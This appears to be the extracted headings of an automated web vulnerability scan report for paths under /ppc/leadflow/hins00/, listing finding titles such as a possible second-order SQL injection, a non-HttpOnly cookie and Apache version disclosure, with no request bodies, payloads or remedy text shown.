Request

Response

/ppc/leadflow/hins00/project.php

Parameters

Request

Response

/ppc/leadflow/hins00/leadflow/hins00/project.php

Parameters

Request

Response

/ppc/leadflow/hins00/leadflow/hins00/project.php

Parameters

Request

Response

[Possible] Second Order SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/ppc/leadflow/hins00/project.php

Request

Response

Cookie Not Marked As HttpOnly

Impact

Actions to Take

Remedy

External References

/ppc/leadflow/hins00/ CONFIRMED

Identified Cookie

Request

Response

Apache Version Disclosure

Impact